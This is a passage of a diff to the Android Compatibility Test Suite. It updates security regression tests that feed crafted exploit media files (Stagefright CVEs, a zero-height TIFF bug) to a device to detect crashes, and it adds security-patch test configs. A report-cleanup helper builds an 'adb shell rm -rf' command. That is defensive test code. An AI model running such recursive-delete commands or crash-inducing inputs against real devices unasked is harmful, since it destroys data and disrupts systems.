+ int n = ex.readSampleData(inputBuffers[bufidx], 0);
if (n < 0) {
flags = MediaCodec.BUFFER_FLAG_END_OF_STREAM;
time = 0;
@@ -462,14 +601,8 @@
codec.releaseOutputBuffer(status, true);
}
}
- } catch (MediaCodec.CodecException ce) {
- if (ce.getErrorCode() == MediaCodec.CodecException.ERROR_RECLAIMED) {
- // This indicates that the remote service is dead, suggesting a crash.
- throw new RuntimeException(ce);
- }
- // Other errors ignored.
- } catch (IllegalStateException ise) {
- // Other errors ignored.
+ } catch (Exception e) {
+ // local exceptions ignored, not security issues
} finally {
codec.release();
}
@@ -480,9 +613,19 @@
assertFalse("Device *IS* vulnerable to " + cve,
mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
thr.stopLooper();
-
+ thr.join();
}
+
private void doStagefrightTestMediaMetadataRetriever(final int rid) throws Exception {
+ doStagefrightTestMediaMetadataRetriever(rid, null);
+ }
+
+ private void doStagefrightTestMediaMetadataRetriever(final String url) throws Exception {
+ doStagefrightTestMediaMetadataRetriever(-1, url);
+ }
+
+ private void doStagefrightTestMediaMetadataRetriever(
+ final int rid, final String url) throws Exception {
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
@@ -492,8 +635,9 @@
MediaPlayer mp = new MediaPlayer();
mp.setOnErrorListener(mpcl);
+ AssetFileDescriptor fd = null;
try {
- AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
+ fd = getInstrumentation().getContext().getResources()
.openRawResourceFd(R.raw.good);
// the onErrorListener won't receive MEDIA_ERROR_SERVER_DIED until
@@ -501,6 +645,7 @@
mp.setDataSource(fd.getFileDescriptor(),
fd.getStartOffset(),
fd.getLength());
+ fd.close();
} catch (Exception e) {
// this is a known-good file, so no failure should occur
fail("setDataSource of known-good file failed");
@@ -520,22 +665,29 @@
}
Resources resources = getInstrumentation().getContext().getResources();
- AssetFileDescriptor fd = resources.openRawResourceFd(rid);
MediaMetadataRetriever retriever = new MediaMetadataRetriever();
- try {
- retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
- } catch (IllegalArgumentException e) {
- // ignore
+ if (url == null) {
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IllegalArgumentException e) {
+ // ignore
+ } finally {
+ closeQuietly(fd);
+ }
+ } else {
+ retriever.setDataSource(url, new HashMap<String, String>());
}
retriever.extractMetadata(MediaMetadataRetriever.METADATA_KEY_DURATION);
retriever.getEmbeddedPicture();
retriever.getFrameAtTime();
retriever.release();
- String rname = resources.getResourceEntryName(rid);
+ String rname = url != null ? url : resources.getResourceEntryName(rid);
String cve = rname.replace("_", "-").toUpperCase();
assertFalse("Device *IS* vulnerable to " + cve,
mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
thr.stopLooper();
+ thr.join();
}
}
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
index b06b5a1..807412b 100644
--- a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -19,13 +19,13 @@
import junit.framework.TestCase;
import android.content.Context;
+import android.platform.test.annotations.SecurityTest;
import android.media.audiofx.AudioEffect;
import android.media.MediaPlayer;
import android.media.audiofx.Visualizer;
import android.test.AndroidTestCase;
import android.test.InstrumentationTestCase;
import android.util.Log;
-import android.security.cts.R;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
@@ -39,6 +39,7 @@
}
//Testing security bug: 30229821
+ @SecurityTest
public void testVisualizer_MalformedConstructor() throws Exception {
final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
final int VISUALIZER_CMD_MEASURE = 0x10001;
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
index f81da6b..bbc70a9 100644
--- a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -18,6 +18,7 @@
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
import android.test.AndroidTestCase;
import java.io.InputStream;
@@ -31,6 +32,7 @@
* Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
* With the fix, decoding will fail, without dividing by zero.
*/
+ @SecurityTest
public void test_android_bug_33300701() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
old mode 100755
new mode 100644
index b896229..3e071b6
--- a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
+++ b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
@@ -25,10 +25,7 @@
import android.content.pm.ServiceInfo;
import android.content.res.Resources;
import android.os.Parcel;
-import android.os.ParcelFileDescriptor;
-import android.support.test.InstrumentationRegistry;
import android.test.AndroidTestCase;
-import android.text.TextUtils;
import android.util.Printer;
import android.view.inputmethod.InputMethod;
import android.view.inputmethod.InputMethodInfo;
@@ -37,10 +34,7 @@
import org.xmlpull.v1.XmlPullParserException;
-import java.io.BufferedReader;
import java.io.IOException;
-import java.io.InputStreamReader;
-import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
@@ -249,11 +243,6 @@
return;
}
- if (!TextUtils.equals("native", getFbeMode())) {
- // Skip the test unless the device is in native FBE mode.
- return;
- }
-
final InputMethodManager imm = mContext.getSystemService(InputMethodManager.class);
final List<InputMethodInfo> imis = imm.getInputMethodList();
boolean hasEncryptionAwareInputMethod = false;
@@ -279,22 +268,4 @@
public void println(String x) {
}
}
-
- private String getFbeMode() {
- try (ParcelFileDescriptor.AutoCloseInputStream in =
- new ParcelFileDescriptor.AutoCloseInputStream(
- InstrumentationRegistry
- .getInstrumentation()
- .getUiAutomation()
- .executeShellCommand("sm get-fbe-mode"))) {
- try (BufferedReader br =
- new BufferedReader(new InputStreamReader(in, StandardCharsets.UTF_8))) {
- // Assume that the output of "sm get-fbe-mode" is always one-line.
- final String line = br.readLine();
- return line != null ? line.trim() : "";
- }
- } catch (IOException e) {
- return "";
- }
- }
}
diff --git a/tools/cts-tradefed/Android.mk b/tools/cts-tradefed/Android.mk
index c447ce8..e0f6193 100644
--- a/tools/cts-tradefed/Android.mk
+++ b/tools/cts-tradefed/Android.mk
@@ -25,7 +25,7 @@
LOCAL_SUITE_TARGET_ARCH := $(TARGET_ARCH)
LOCAL_SUITE_NAME := CTS
LOCAL_SUITE_FULLNAME := "Compatibility Test Suite"
-LOCAL_SUITE_VERSION := 7.0_r8
+LOCAL_SUITE_VERSION := 7.0_r201705s
LOCAL_MODULE := cts-tradefed
diff --git a/tools/cts-tradefed/res/config/cts-dev.xml b/tools/cts-tradefed/res/config/cts-dev.xml
new file mode 100644
index 0000000..0cf53ca
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-dev.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs CTS with common options set developer workflow: skips most checks">
+
+ <include name="cts" />
+
+ <option name="log-level" value="verbose" />
+ <option name="skip-preconditions" value="true" />
+ <option name="skip-device-info" value="true" />
+
+ <option name="compatibility:plan" value="cts-dev" />
+ <option name="compatibility:skip-all-system-status-check" value="true" />
+ <option name="compatibility:primary-abi-only" value="true" />
+
+</configuration>
diff --git a/tools/cts-tradefed/res/config/cts-sts.xml b/tools/cts-tradefed/res/config/cts-sts.xml
new file mode 100644
index 0000000..8e4c030
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-sts.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs Security Patch test cases">
+
+ <option name="plan" value="cts-sts" />
+
+ <include name="cts"/>
+
+ <option name="compatibility:include-filter" value="CtsSecurityTestCases" />
+
+ <option name="compatibility:include-filter" value="CtsSecurityHostTestCases" />
+
+ <!-- Only run tests with @SecurityTest annotation. -->
+ <option name="compatibility:module-arg" value="CtsSecurityHostTestCases:include-annotation:android.platform.test.annotations.SecurityTest"/>
+
+ <option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:include-annotation:android.platform.test.annotations.SecurityTest" />
+
+</configuration>
diff --git a/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java b/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
index 6385139..2463f87 100644
--- a/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
+++ b/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
@@ -48,7 +48,7 @@
@Option(name="branch", description="build branch name to supply.")
private String mBranch = null;
- public static final String CTS_BUILD_VERSION = "7.0_r3";
+ public static final String CTS_BUILD_VERSION = "7.0_r201701s";
public static final String CTS_PACKAGE = "com.android.cts.tradefed.testtype";
/**
diff --git a/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java b/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
index 6ab175f..9233a4a 100644
--- a/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
+++ b/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
@@ -43,7 +43,6 @@
// Delete earlier report logs if present on device.
String command = String.format("adb -s %s shell rm -rf %s", device.getSerialNumber(),
SRC_DIR);
- CLog.e(command);
if (device.doesFileExist(SRC_DIR)) {
Process process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
command});
